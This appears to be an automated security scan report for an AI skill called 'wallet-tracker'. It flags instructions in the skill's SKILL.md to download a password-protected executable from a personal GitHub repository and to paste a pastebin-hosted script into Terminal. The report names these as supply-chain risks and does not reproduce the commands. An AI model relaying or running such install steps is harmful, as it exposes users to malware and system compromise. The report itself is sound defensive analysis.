Trust Assessment
wallet-tracker received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 2 critical, 0 high, 1 medium, and 1 low severity. Key findings include Unpinned dependency in manifest, Untrusted executable download for Windows prerequisite, Untrusted script execution for macOS prerequisite.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 31/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Untrusted executable download for Windows prerequisite The skill instructs users to download and run an executable (`openclaw-agent.zip`) from a single user's GitHub repository (`hedefbari`). This is a significant supply chain risk as the executable's integrity and maliciousness cannot be easily verified. Running arbitrary executables from untrusted or unverified sources can lead to system compromise. The requirement to use a password (`openclaw`) to extract the zip is also unusual and potentially suspicious. Provide a trusted, verified source for the `openclaw-agent` utility, or ideally, integrate its functionality directly into the skill or use standard, auditable package managers. If an external binary is absolutely necessary, provide cryptographic hashes (e.g., SHA256) for verification and host it on a trusted domain. | LLM | SKILL.md:10 | |
| CRITICAL | Untrusted script execution for macOS prerequisite The skill instructs users to copy and paste an installation script from `glot.io`, a public pastebin-like service, into their Terminal. Executing arbitrary scripts from such untrusted sources is a severe supply chain risk, as the script's content can change at any time and could contain malicious commands leading to system compromise. Provide a trusted, verified source for the `openclaw-agent` utility, or ideally, integrate its functionality directly into the skill or use standard, auditable package managers. If an external script is absolutely necessary, host it on a trusted domain and provide cryptographic hashes for verification. | LLM | SKILL.md:13 | |
| MEDIUM | API key exposure in example code While the examples use placeholders like 'YourApiKey', they demonstrate a pattern of directly embedding API keys into URLs or source code. This practice, if followed by users with real keys, can lead to accidental exposure of credentials in shell history, logs, or version control systems. Advise users to use environment variables or a secure configuration management system for API keys instead of embedding them directly in commands or scripts. Provide examples demonstrating the use of environment variables (e.g., `os.environ.get("ETHERSCAN_API_KEY")`). | LLM | SKILL.md:30 | |
| LOW | Unpinned dependency in manifest The 'requests' package is specified without a version constraint in the skill's manifest, which can lead to non-deterministic builds and potential security vulnerabilities if a new version introduces breaking changes or security flaws. Pin the 'requests' dependency to a specific version (e.g., 'requests==2.28.1') or use a version range with an upper bound (e.g., 'requests>=2.28.1,<3.0.0'). | LLM | SKILL.md |
Scan History
Embed Code
[](https://skillshield.io/report/cc605a09dca76cb4)
Powered by SkillShield